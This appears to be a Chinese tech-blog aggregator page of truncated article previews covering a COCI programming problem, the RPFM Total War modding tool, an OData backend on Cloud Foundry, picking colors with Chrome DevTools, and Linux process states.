P7617 [COCI 2011/2012 #2] KOMPIĆI 题目描述 给定 NNN 个正整数 A1,A2,...,ANA_1,A_2,...,A_NA1​,A2​,...,AN​&#xff0c;求有多少整数对 (i,j)(i,j)(i,j)&#xff0c;满足以下条件&#xff1a; 1≤i<j≤N1 \le i < j \le N1≤i<j≤NAiA_iAi​ 和 AjA_jAj​ 至…...

如何让全面战争MOD开发从繁琐变得优雅:RPFM的现代化解决方案

如何让全面战争MOD开发从繁琐变得优雅&#xff1a;RPFM的现代化解决方案 【免费下载链接】rpfm Rusted PackFile Manager (RPFM) is a... reimplementation in Rust and Qt5 of PackFile Manager (PFM), one of the best modding tools for Total War Games. 项目地址: https…...

我第一次做 OData 后端服务时,真正绊住我的,不是代码,而是 Cloud Foundry 里的这些基础坑

最近我给自己加了一条训练线,除了平时在社区里吸收知识、输出知识,我还逼着自己每周完成一个带明确目标的小任务。第二个任务,我挑了一个很适合拿来练基本功的方向,亲手做一个基于 OData 的后端服务。 原本我以为,真正费劲的部分会落在 OData 协议本身,像 entity、servi…...

CSS如何快速获取网页上的标准色值_借助开发者工具的取色器和色彩格式转换功能

Chrome开发者工具中点击Styles面板颜色旁小色块启用取色器&#xff0c;悬停页面实时显示hex/rgb/hsl值&#xff0c;长按可循环切换格式&#xff1b;rgba透明度和色彩空间差异会导致与设计稿不一致。Chrome开发者工具里怎么直接取网页上某个颜色的十六进制值点开 DevTools&#…...

【Linux】进程(2)状态

目录 一、冯诺依曼 二、操作系统 三、进程状态 &#xff08;1&#xff09;运行状态&#xff1a;进程已获得CPU资源&#xff0c;正在执行指令&#xff0c;是进程生命周期中唯一能直接操作硬件、推进任务的阶段。 &#xff08;2&#xff09;阻塞状态&#xff1a;进程因等待特…...